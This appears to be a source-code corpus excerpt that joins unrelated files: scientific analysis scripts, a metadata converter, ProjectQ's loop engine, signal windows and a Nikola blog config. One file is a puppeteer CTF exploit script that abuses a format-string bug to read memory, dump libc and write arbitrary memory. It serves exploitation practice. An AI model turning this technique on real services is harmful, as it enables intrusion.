self._PROJECT, fixed_batch_size=self._WRITE_BATCH_INITIAL_SIZE)
datastore_write_fn.start_bundle()
for entity in entities:
datastore_helper.add_properties(
entity, {'large': u'A' * 100000}, exclude_from_indexes=True)
datastore_write_fn.process(WriteToDatastore.to_upsert_mutation(entity))
datastore_write_fn.finish_bundle()
self.assertEqual(2, self._mock_datastore.commit.call_count)
def verify_unique_keys(self, queries):
"""A helper function that verifies if all the queries have unique keys."""
keys, _ = zip(*queries)
keys = set(keys)
self.assertEqual(len(keys), len(queries))
def check_estimated_size_bytes(self, entity_bytes, timestamp, namespace=None):
"""A helper method to test get_estimated_size_bytes"""
timestamp_req = helper.make_request(
self._PROJECT, namespace, helper.make_latest_timestamp_query(namespace))
timestamp_resp = self.make_stats_response(
{'timestamp': datastore_helper.from_timestamp(timestamp)})
kind_stat_req = helper.make_request(
self._PROJECT,
namespace,
helper.make_kind_stats_query(
namespace,
self._query.kind[0].name,
datastore_helper.micros_from_timestamp(timestamp)))
kind_stat_resp = self.make_stats_response({'entity_bytes': entity_bytes})
def fake_run_query(req):
if req == timestamp_req:
return timestamp_resp
elif req == kind_stat_req:
return kind_stat_resp
else:
print(kind_stat_req)
raise ValueError("Unknown req: %s" % req)
self._mock_datastore.run_query.side_effect = fake_run_query
self.assertEqual(
entity_bytes,
ReadFromDatastore.get_estimated_size_bytes(
self._PROJECT, namespace, self._query, self._mock_datastore))
self.assertEqual(
self._mock_datastore.run_query.call_args_list,
[call(timestamp_req), call(kind_stat_req)])
def make_stats_response(self, property_map):
resp = datastore_pb2.RunQueryResponse()
entity_result = resp.batch.entity_results.add()
datastore_helper.add_properties(entity_result.entity, property_map)
return resp
def split_query(self, query, num_splits):
"""Generate dummy query splits."""
split_queries = []
for _ in range(0, num_splits):
q = query_pb2.Query()
q.CopyFrom(query)
split_queries.append(q)
return split_queries
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 1,300,370,424,797,232,600 | 38.798722 | 80 | 0.6687 | false |
tayebzaidi/snova_analysis | Miscellaneous/typ1a_features.py | 1 | 2252 | import matplotlib.pyplot as plt
import scipy.interpolate as scinterp
import numpy as np
import peakfinding
import peak_original
import smoothing
import plotter
import random
import readin
import sys
import os
if __name__== '__main__':
Mbdata = []
delM15data = []
path = "/Users/zaidi/Documents/REU/restframe/"
filenames = os.listdir(path)
random.shuffle(filenames)
for filename in filenames:
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
indB = np.where((data.band == 'B'))
Bdata = data[indB]
Bdata = np.sort(Bdata)
if len(Bdata.phase) > 3:
spl = scinterp.UnivariateSpline(Bdata.phase, Bdata.mag)
spl.set_smoothing_factor(2./len(Bdata.phase))
phase_new = np.arange(Bdata.phase[0], Bdata.phase[-1], 1)
mag_new = spl(phase_new)
maxp, minp = peak_original.peakdet(mag_new, 0.5, phase_new)
if len(minp) > 0 and minp[0][0] < 5 and minp[0][0] > -5:
Mb = minp[0][1]
delM15 = minp[0][1] - spl(minp[0][0]+15)
Mbdata.append(Mb)
delM15data.append(delM15)
if delM15 > 0 or delM15 < -5:
print minp
print filename
print spl(minp[0][0] + 15)
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
ax.plot(phase_new, mag_new)
ax.plot(Bdata.phase, Bdata.mag)
if len(minp) > 0:
ax.scatter(minp[:,0],minp[:,1])
plt.show(fig)
'''
maxp, minp = peakfinding.peakdetect(mag_new, phase_new, 200, 1.5)
if len(minp) > 0:
print minp
print filename
fig = plt.figure(1)
ax = fig.add_subplot(1,1,1)
#ax.scatter(minp[:,0], minp[:,1],'bo')
#ax.plot(Bdata.phase, Bdata.mag)
#plt.show(fig)
'''
#interp = smoothing.Interpolate1D(data.phase
print Mbdata
print delM15data
fig = plt.figure(2)
ax = fig.add_subplot(1,1,1)
ax.scatter(Mbdata, delM15data)
plt.show(fig)
| gpl-3.0 | -7,822,784,365,329,970,000 | 33.121212 | 73 | 0.521314 | false |
DREAM-ODA-OS/tools | metadata/dimap2eop.py | 1 | 3474 | #!/usr/bin/env python
#------------------------------------------------------------------------------
#
# Extract O&M-EOP metadata document.
#
# Project: EO Metadata Handling
# Authors: Martin Paces <[email protected]>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2013 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
import traceback
import sys
import os.path
from lxml import etree as et
from profiles.interfaces import ProfileDimap
from profiles.spot6_ortho import ProfileSpot6Ortho
from profiles.spot_view import ProfileSpotView
from profiles.spot_scene_1a import ProfileSpotScene1a
from profiles.pleiades1_ortho import ProfilePleiades1Ortho
XML_OPTS = {'pretty_print': True, 'xml_declaration': True, 'encoding': 'utf-8'}
PROFILES = (
ProfileSpotScene1a, ProfileSpotView,
ProfileSpot6Ortho, ProfilePleiades1Ortho,
)
def main(fname):
xml = et.parse(fname, et.XMLParser(remove_blank_text=True))
profile = get_profile(xml)
print et.tostring(profile.extract_eop_metadata(xml, file_name=fname), **XML_OPTS)
def get_profile(xml):
for item in PROFILES:
if item.check_profile(xml):
return item
prf = ProfileDimap.get_dimap_profile(xml)
if prf is None:
raise ValueError("Not a DIMAP XML document!")
profile, version = prf
raise ValueError("Unsupported DIMAP version %s profile '%s'!"%(version, profile))
#------------------------------------------------------------------------------
if __name__ == "__main__":
EXENAME = os.path.basename(sys.argv[0])
DEBUG = False
try:
XML = sys.argv[1]
for arg in sys.argv[2:]:
if arg == "DEBUG":
DEBUG = True # dump debuging output
except IndexError:
print >>sys.stderr, "ERROR: %s: Not enough input arguments!"%EXENAME
print >>sys.stderr
print >>sys.stderr, "Extract EOP XML metadata from DIMAP XML metadata."
print >>sys.stderr
print >>sys.stderr, "USAGE: %s <input-xml> [DEBUG]"%EXENAME
sys.exit(1)
if DEBUG:
print >>sys.stderr, "input-xml: ", XML
try:
main(XML)
except Exception as exc:
print >>sys.stderr, "ERROR: %s: %s "%(EXENAME, exc)
if DEBUG:
print >>sys.stderr, traceback.format_exc()
sys.exit(1)
| mit | -2,620,814,347,079,095,300 | 36.354839 | 85 | 0.632988 | false |
billbrod/spatial-frequency-preferences | sfp/image_computable.py | 1 | 6815 | #!/usr/bin/python
"""code to help run the image-computable version of the model
we're using this primarily to check the effect of vignetting, but this does make our project
image-computable (though it's a linear model and so will fail in some trivial cases)
"""
import itertools
import argparse
import numpy as np
import pandas as pd
import pyrtools as pt
from scipy import interpolate
def upsample(signal, target_shape):
"""upsample a signal to target_shape
this uses scipy's interpolate.interp2d (and so will end up with a smoothed signal)
"""
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=signal.shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=signal.shape[1])
f = interpolate.interp2d(x, y, signal)
x = np.linspace(-(signal.shape[0]-1)/2, (signal.shape[0]-1)/2, num=target_shape[0])
y = np.linspace(-(signal.shape[1]-1)/2, (signal.shape[1]-1)/2, num=target_shape[1])
return f(x,y)
def calc_energy_and_filters(stim, stim_df, n_orientations=6, save_path_template=None):
"""this creates the energy and filter arrays
We assume the stimuli have natural groups, here indexed by the "class_idx" column in stim_df,
and all stimuli within these groups should be considered the same stimuli, that is, we sum the
energy across all of them. for the spatial frequency project, these are the different phases of
the gratings (because of how we structure our experiment, we estimate a response amplitude to
all phases together).
Note that this will take a while to run (~10 or 20 minutes). Since it only needs to run once
per experiment, didn't bother to make it efficient at all. The outputs will also be very large,
totalling about 11GB
Parameters
----------
stim : np.ndarray
The stimuli to produce energy for. Should have shape (n, *img_size), where n is the number
of total stimuli.
stim_df : pd.DataFrame
The DataFrame describing the stimuli. Must contain the column "class_idx", which indexes
the different stimulus classes (see above)
n_orientations : int
the number of orientations in the steerable pyramid. 6 is the number used to model fMRI
voxels in Roth, Z. N., Heeger, D., & Merriam, E. (2018). Stimulus vignetting and
orientation selectivity in human visual cortex. bioRxiv.
save_path_template : str or None
the template string for the save path we'll use for energy and filters. should end in .npy
and contain one %s, which we'll replace with "energy" and "filters".
Returns
-------
energy : np.ndarray
energy has shape (stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size) and
contains the energy (square and absolute value the complex valued output of
SteerablePyramidFreq; equivalently, square and sum the output of the quadrature pair of
filters that make up the pyramid) for each image, at each scale and orientation. the energy
has all been upsampled to the size of the initial image.
filters : np.ndarray
filters has shape (max_ht, n_orientations, *img_size) and is the fourier transform of the
filters at each scale and orientation, zero-padded so they all have the same size. we only
have one set of filters (instead of one per stimulus class) because the same pyramid was
used for each of them; we ensure this by getting the filters for each stimulus class and
checking that they're individually equal to the average across classes.
"""
img_size = stim.shape[1:]
# this computation comes from the SteerablePyramidFreq code
max_ht = int(np.floor(np.log2(min(img_size))) - 2)
energy = np.zeros((stim_df.class_idx.nunique(), max_ht, n_orientations, *img_size),
dtype=np.float32)
filters = np.zeros_like(energy)
for i, g in stim_df.groupby('class_idx'):
idx = g.index
filled_filters = False
for j in idx:
pyr = pt.pyramids.SteerablePyramidFreq(stim[j], order=n_orientations-1, is_complex=True)
for k, l in itertools.product(range(max_ht), range(n_orientations)):
energy[int(i), k, l, :, :] += upsample(np.abs(pyr.pyr_coeffs[(k, l)])**2, img_size)
# we only want to run this once per stimulus class
if not filled_filters:
if k > 0:
lomask = pyr._lomasks[k-1]
else:
lomask = pyr._lo0mask
filt = pyr._anglemasks[k][l] * pyr._himasks[k] * lomask
pad_num = []
for m in range(2):
pad_num.append([(img_size[m] - filt.shape[m])//2, (img_size[m] - filt.shape[m])//2])
if filt.shape[m] + 2*pad_num[m][0] != img_size[m]:
pad_num[m][0] += img_size[m] - (filt.shape[m] + 2*pad_num[m][0])
filters[int(i), k, l, :, :] = np.pad(filt, pad_num, 'constant', constant_values=0)
filled_filters = True
filter_mean = np.mean(filters, 0)
for i in range(filters.shape[0]):
if not(np.allclose(filter_mean, filters[i,:,:,:,:])):
raise Exception("Something has gone terribly wrong, the filters for stim class %d are different than the rest!" % i)
filters = filter_mean
if save_path_template is not None:
np.save(save_path_template % "energy", energy)
np.save(save_path_template % "filters", filters)
return energy, filters
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=("Calculate and save the energy for each stimulus class, as well as the Fourier"
" transform of the filters of the steerable pyramid we use to get this. For "
"use with image-computable version of this model"),
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("stimuli",
help=("Path to the stimulus .npy file."))
parser.add_argument("stimuli_description_df",
help=("Path to the stimulus description dataframe .csv file."))
parser.add_argument("save_path_template",
help=("Path template (with .npy extension) where we'll save the results. "
"Should contain one %s."))
parser.add_argument('--n_orientations', '-n', default=6, type=int,
help=("The number of orientations in the steerable pyramid used here."))
args = vars(parser.parse_args())
stim = np.load(args.pop('stimuli'))
stim_df = pd.read_csv(args.pop('stimuli_description_df'))
calc_energy_and_filters(stim, stim_df, **args)
| mit | 7,969,133,745,800,178,000 | 51.423077 | 128 | 0.634776 | false |
ProjectQ-Framework/ProjectQ | projectq/meta/_loop.py | 1 | 9774 | # -*- coding: utf-8 -*-
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tools to implement loops.
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
"""
from copy import deepcopy
from projectq.cengines import BasicEngine
from projectq.ops import Allocate, Deallocate
from ._util import insert_engine, drop_engine_after
class QubitManagementError(Exception):
"""Exception raised when the lifetime of a qubit is problematic within a loop"""
class LoopTag:
"""
Loop meta tag
"""
def __init__(self, num):
self.num = num
self.id = LoopTag.loop_tag_id
LoopTag.loop_tag_id += 1
def __eq__(self, other):
return isinstance(other, LoopTag) and self.id == other.id and self.num == other.num
def __ne__(self, other):
return not self.__eq__(other)
loop_tag_id = 0
class LoopEngine(BasicEngine):
"""
Stores all commands and, when done, executes them num times if no loop tag
handler engine is available.
If there is one, it adds a loop_tag to the commands and sends them on.
"""
def __init__(self, num):
"""
Initialize a LoopEngine.
Args:
num (int): Number of loop iterations.
"""
BasicEngine.__init__(self)
self._tag = LoopTag(num)
self._cmd_list = []
self._allocated_qubit_ids = set()
self._deallocated_qubit_ids = set()
# key: qubit id of a local qubit, i.e. a qubit which has been allocated
# and deallocated within the loop body.
# value: list contain reference to each weakref qubit with this qubit
# id either within control_qubits or qubits.
self._refs_to_local_qb = dict()
self._next_engines_support_loop_tag = False
def run(self):
"""
Apply the loop statements to all stored commands.
Unrolls the loop if LoopTag is not supported by any of the following
engines, i.e., if
.. code-block:: python
is_meta_tag_supported(next_engine, LoopTag) == False
"""
error_message = (
"\n Error. Qubits have been allocated in with "
"Loop(eng, num) context,\n which have not "
"explicitely been deallocated in the Loop context.\n"
"Correct usage:\nwith Loop(eng, 5):\n"
" qubit = eng.allocate_qubit()\n"
" ...\n"
" del qubit[0]\n"
)
if not self._next_engines_support_loop_tag: # pylint: disable=too-many-nested-blocks
# Unroll the loop
# Check that local qubits have been deallocated:
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
if len(self._allocated_qubit_ids) == 0:
# No local qubits, just send the circuit num times
for i in range(self._tag.num):
self.send(deepcopy(self._cmd_list))
else:
# Ancilla qubits have been allocated in loop body
# For each iteration, allocate and deallocate a new qubit and
# replace the qubit id in all commands using it.
for i in range(self._tag.num):
if i == 0: # Don't change local qubit ids
self.send(deepcopy(self._cmd_list))
else:
# Change local qubit ids before sending them
for refs_loc_qubit in self._refs_to_local_qb.values():
new_qb_id = self.main_engine.get_new_qubit_id()
for qubit_ref in refs_loc_qubit:
qubit_ref.id = new_qb_id
self.send(deepcopy(self._cmd_list))
else:
# Next engines support loop tag so no unrolling needed only
# check that all qubits have been deallocated which have been
# allocated in the loop body
if self._deallocated_qubit_ids != self._allocated_qubit_ids:
raise QubitManagementError(error_message)
def receive(self, command_list): # pylint: disable=too-many-branches
"""
Receive (and potentially temporarily store) all commands.
Add LoopTag to all receiving commands and send to the next engine if
a further engine is a LoopTag-handling engine. Otherwise store all
commands (to later unroll them). Check that within the loop body,
all allocated qubits have also been deallocated. If loop needs to be
unrolled and ancilla qubits have been allocated within the loop body,
then store a reference all these qubit ids (to change them when
unrolling the loop)
Args:
command_list (list<Command>): List of commands to store and later
unroll or, if there is a LoopTag-handling engine, add the
LoopTag.
"""
# pylint: disable=too-many-nested-blocks
if self._next_engines_support_loop_tag or self.next_engine.is_meta_tag_supported(LoopTag):
# Loop tag is supported, send everything with a LoopTag
# Don't check is_meta_tag_supported anymore
self._next_engines_support_loop_tag = True
if self._tag.num == 0:
return
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
elif cmd.gate == Deallocate:
self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
cmd.tags.append(self._tag)
self.send([cmd])
else:
# LoopTag is not supported, save the full loop body
self._cmd_list += command_list
# Check for all local qubits allocated and deallocated in loop body
for cmd in command_list:
if cmd.gate == Allocate:
self._allocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id] = [cmd.qubits[0][0]]
elif cmd.gate == Deallocate:
self._deallocated_qubit_ids.add(cmd.qubits[0][0].id)
# Save reference to this local qubit
self._refs_to_local_qb[cmd.qubits[0][0].id].append(cmd.qubits[0][0])
else:
# Add a reference to each place a local qubit id is
# used as within either control_qubit or qubits
for control_qubit in cmd.control_qubits:
if control_qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[control_qubit.id].append(control_qubit)
for qureg in cmd.qubits:
for qubit in qureg:
if qubit.id in self._allocated_qubit_ids:
self._refs_to_local_qb[qubit.id].append(qubit)
class Loop:
"""
Loop n times over an entire code block.
Example:
.. code-block:: python
with Loop(eng, 4):
# [quantum gates to be executed 4 times]
Warning:
If the code in the loop contains allocation of qubits, those qubits have to be deleted prior to exiting the
'with Loop()' context.
This code is **NOT VALID**:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
H | qb # qb is still available!!!
The **correct way** of handling qubit (de-)allocation is as follows:
.. code-block:: python
with Loop(eng, 4):
qb = eng.allocate_qubit()
...
del qb # sends deallocate gate
"""
def __init__(self, engine, num):
"""
Enter a looped section.
Args:
engine: Engine handling the commands (usually MainEngine)
num (int): Number of loop iterations
Example:
.. code-block:: python
with Loop(eng, 4):
H | qb
Rz(M_PI/3.) | qb
Raises:
TypeError: If number of iterations (num) is not an integer
ValueError: If number of iterations (num) is not >= 0
"""
self.engine = engine
if not isinstance(num, int):
raise TypeError("Number of loop iterations must be an int.")
if num < 0:
raise ValueError("Number of loop iterations must be >=0.")
self.num = num
self._loop_eng = None
def __enter__(self):
if self.num != 1:
self._loop_eng = LoopEngine(self.num)
insert_engine(self.engine, self._loop_eng)
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.num != 1:
# remove loop handler from engine list (i.e. skip it)
self._loop_eng.run()
self._loop_eng = None
drop_engine_after(self.engine)
| apache-2.0 | -7,039,027,857,358,893,000 | 37.031128 | 115 | 0.562717 | false |
shellphish/puppeteer | examples/ructf_2014_pwn200/doit.py | 1 | 2635 | import puppeteer as p
import logging
try:
import standard_logging # pylint: disable=W0611
except ImportError:
pass
#logging.getLogger("puppeteer.connection").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.manipulator").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.vuln_decorators").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.formatter").setLevel(logging.DEBUG)
class Aggravator(p.Manipulator):
def __init__(self, host, port):
p.Manipulator.__init__(self, p.x86)
# some initial info from IDA
# TODO: maybe use IDALink to get this automatically?
self.permanent_info['main_start'] = 0x0804A9B3
self.permanent_info['main_end'] = 0x0804A9D1
self.permanent_info['main_stackframe_size'] = 0x24
self.c = self.set_connection(p.Connection(host=host, port=port).connect())
self.c.read_until("> ")
@p.printf(byte_offset=244, max_length=31, forbidden={'\x00', '\x0a'})
def stats_printf(self, fmt):
self.c.send("stats " + fmt + "\n")
self.c.read_until("kill top:\n")
try:
result = self.c.read_until("\n"*5, timeout=3)[:-5]
self.c.read_until("> ", timeout=3)
except EOFError:
print "Program didn't finish the print"
return ""
#print "GOT:",repr(result)
return result
def main():
# Create the Aggravator!
a = Aggravator(sys.argv[1], int(sys.argv[2]))
# And now, we can to stuff!
# We can read the stack!
#print "STACKZ",a.dump_stack(1000).encode('hex')
print "Testing memory read."
assert a.do_memory_read(0x0804A9C3, 16) == '\x00\x8B\x44\x24\x1C\x89\x04\x24\xE8\x20\xFE\xFF\xFF\xC9\xC3\x66'
## We can figure out where __libc_start_main is!
lcsm = a.main_return_address(start_offset=390)
print "main() will return to (presumably, this is in libc):",hex(lcsm)
# interactive memory explorer!
a.memory_explorer(lcsm)
# now dump it!
libc = a.dump_elf(lcsm) #- 0x1000 # the minus is because on my test machine, the address has a \x00 in it
print "dumped %d pages from libc" % len(libc)
#a.dump_libc("aggregator_libc", start_offset=390)
# We can overwrite memory with ease!
a.do_memory_write(0x0804C344, "OK")
assert a.do_memory_read(0x0804C344, 2) == "OK"
a.c.send("quit\n")
#libc_page_start = lcsm & 0xfffff000
#libc_page_content = a.do_memory_read(libc_page_start, 0x1000)
#open("dumped", "w").write(libc_page_content)
#print "read out %d bytes from libc!" % len(libc_page_content)
if __name__ == '__main__':
import sys
main()
| gpl-3.0 | -910,140,454,615,389,800 | 33.671053 | 113 | 0.639848 | false |
jpaasen/cos | framework/Window.py | 1 | 5925 | #from TypeExtensions import Ndarray
from gfuncs import processArgs
from mynumpy import pi, dot, cos, sin, exp #ones, complex, sin, linspace, exp, pi, dot, angle
import mynumpy as np
#from pylab import plot, subplot, xlabel, ylabel, grid, show, figure, ion, ioff
class Window(np.Ndarray):
def __new__(self, type='rect', **kwargs):
from gfuncs import error
if type == 'rect':
return self.rect(self,kwargs)
elif type == 'kaiser':
return self.kaiser(kwargs)
else:
error(self, 'The window type %s is not recognised'%type)
#
# Configurable.__init__(self)
# Operable.__init__(self)
class Rect(np.Ndarray):
def __new__(self, M=10, phi=0, normalised=True):
# Create the window
if phi == 0:
win = np.ones( (M,), dtype=None ) / M
else:
wc = np.ones( M, dtype=complex ) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
class Trig(np.Ndarray):
def __new__(self, M=10, a=0.54, phi=0, normalised=True):
# Create the window
if phi == 0:
wc = a + (1-a)*np.cos(2*pi*np.linspace(-0.5,0.5,M))
win = wc / sum(wc) # Normalised window
else:
n = np.linspace(-0.5,0.5,M)
wc = a + (1-a)*np.cos(2*pi*n) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
aa = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, aa) # Normalisation factor
win = aa * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
class Kaiser(np.Ndarray):
'''kaiser( M=10, beta=1, phi=0, normalised=True )
The Kaiser window is a taper formed by using a Bessel function.
Parameters
----------
M (int) : Number of points in the output window.
beta (float) : Shape parameter for window.
phi (float) : Steering angle.
normalised (boolean) : Use normalised window coefficients?
'''
def __new__(self, M=10, beta=1, phi=0, normalised=True, inverted=False):
if not inverted:
if phi == 0:
wc = np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
else:
if phi == 0:
wc = 1 / np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = 1 / np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc,a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Kaiser (beta=%d, phi=%d)'%(beta,phi))
# shape_desc=('M','1'))
return w
# def plot(self, **kwargs):
#
# # Set some default options
# opts = {'magnitude':True, 'angle':False, 'grid':True, 'degrees':True}
#
# # Add the user-specified options
# for key,val in kwargs.iteritems():
# if opts.has_key(key):
# opts[key] = val
# else:
# opts[key] = val
# print 'WW: Window.plot() - Supplied parameter '+key+' is unknown.'
#
# ion()
# if opts['magnitude'] and opts['angle']:
# figure()
# subplot(2,1,1)
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
#
# subplot(2,1,2)
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
#
# elif opts['magnitude']:
# figure()
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
## show()
#
# else:
# figure()
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
# ioff()
| mit | 5,193,458,981,794,878,000 | 36.5 | 93 | 0.4427 | false |
masterdje/wibfi | conf.py | 1 | 22684 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Configuration, please edit
# Data about this site
BLOG_AUTHOR = "Dje"
BLOG_TITLE = "Write it before forget it!"
# This is the main URL for your site. It will be used
# in a prominent link
SITE_URL = "http://wibfi.virtua-peanuts.net/"
# This is the URL where nikola's output will be deployed.
# If not set, defaults to SITE_URL
# BASE_URL = "http://getnikola.com/"
BLOG_EMAIL = "[email protected]"
BLOG_DESCRIPTION = "Write it before forget it !"
# Nikola is multilingual!
#
# Currently supported languages are:
# en English
# bg Bulgarian
# ca Catalan
# zh_cn Chinese (Simplified)
# hr Croatian
# nl Dutch
# fr French
# el Greek [NOT gr!]
# de German
# it Italian
# jp Japanese
# fa Persian
# pl Polish
# pt_br Portuguese (Brasil)
# ru Russian
# es Spanish
# tr_tr Turkish (Turkey)
#
# If you want to use Nikola with a non-supported language you have to provide
# a module containing the necessary translations
# (p.e. look at the modules at: ./nikola/data/themes/default/messages/fr.py).
# If a specific post is not translated to a language, then the version
# in the default language will be shown instead.
#from nikola import filters
#FILTERS = {
# ".css": [filters.yui_compressor],
#".js": [filters.yui_compressor],
#}
# What is the default language?
DEFAULT_LANG = "fr"
LOCALES = {'fr': 'fr_FR.utf8', 'en': 'en_US.utf8'}
# What other languages do you have?
# The format is {"translationcode" : "path/to/translation" }
# the path will be used as a prefix for the generated pages location
TRANSLATIONS = {
DEFAULT_LANG: "",
# Example for another language:
"en": "./en",
}
TRANSLATIONS_PATTERN = "{path}.{ext}.{lang}"
# Links for the sidebar / navigation bar.
# You should provide a key-value pair for each used language.
NAVIGATION_LINKS = {
DEFAULT_LANG: (
('/stories/cheatsheets.html', "Cheat-Sheets"),
('/stories/what-s-next.html', "What's next"),
('/archive.html', 'Archives'),
('/categories/index.html', 'Tags'),
('/rss.xml', 'RSS'),
),
"en": (
('/en/stories/cheatsheets.html', "Cheat-Sheets"),
('/en/stories/what-s-next.html', "What's next"),
('/en/archive.html', 'Archives'),
('/en/categories/index.html', 'Tags'),
('/en/rss.xml', 'RSS'),
),
}
# Below this point, everything is optional
# POSTS and PAGES contains (wildcard, destination, template) tuples.
#
# The wildcard is used to generate a list of reSt source files
# (whatever/thing.txt).
#
# That fragment could have an associated metadata file (whatever/thing.meta),
# and opcionally translated files (example for spanish, with code "es"):
# whatever/thing.txt.es and whatever/thing.meta.es
#
# From those files, a set of HTML fragment files will be generated:
# cache/whatever/thing.html (and maybe cache/whatever/thing.html.es)
#
# These files are combinated with the template to produce rendered
# pages, which will be placed at
# output / TRANSLATIONS[lang] / destination / pagename.html
#
# where "pagename" is the "slug" specified in the metadata file.
#
# The difference between POSTS and PAGES is that POSTS are added
# to feeds and are considered part of a blog, while PAGES are
# just independent HTML pages.
#
POSTS = (
("posts/*.txt", "posts", "post.tmpl"),
("posts/*.rst", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.txt", "stories", "story.tmpl"),
("stories/*.rst", "stories", "story.tmpl"),
)
# One or more folders containing files to be copied as-is into the output.
# The format is a dictionary of "source" "relative destination".
# Default is:
FILES_FOLDERS = { 'test': '', 'test': 'posts/','test': 'stories/'}
# Which means copy 'files' into 'output'
# A mapping of languages to file-extensions that represent that language.
# Feel free to add or delete extensions to any list, but don't add any new
# compilers unless you write the interface for it yourself.
#
# 'rest' is reStructuredText
# 'markdown' is MarkDown
# 'html' assumes the file is html and just copies it
COMPILERS = {
"rest": ('.rst', '.txt'),
"markdown": ('.md', '.mdown', '.markdown'),
"textile": ('.textile',),
"txt2tags": ('.t2t',),
"bbcode": ('.bb',),
"wiki": ('.wiki',),
"ipynb": ('.ipynb',),
"html": ('.html', '.htm'),
}
# Create by default posts in one file format?
# Set to False for two-file posts, with separate metadata.
ONE_FILE_POSTS = True
# If this is set to True, then posts that are not translated to a language
# LANG will not be visible at all in the pages in that language.
# If set to False, the DEFAULT_LANG version will be displayed for
# untranslated posts.
# HIDE_UNTRANSLATED_POSTS = False
# Paths for different autogenerated bits. These are combined with the
# translation paths.
# Final locations are:
# output / TRANSLATION[lang] / TAG_PATH / index.html (list of tags)
# output / TRANSLATION[lang] / TAG_PATH / tag.html (list of posts for a tag)
# output / TRANSLATION[lang] / TAG_PATH / tag.xml (RSS feed for a tag)
TAG_PATH = "categories"
# If TAG_PAGES_ARE_INDEXES is set to True, each tag's page will contain
# the posts themselves. If set to False, it will be just a list of links.
# TAG_PAGES_ARE_INDEXES = True
# Final location is output / TRANSLATION[lang] / INDEX_PATH / index-*.html
# INDEX_PATH = ""
# Create per-month archives instead of per-year
CREATE_MONTHLY_ARCHIVE = True
# Final locations for the archives are:
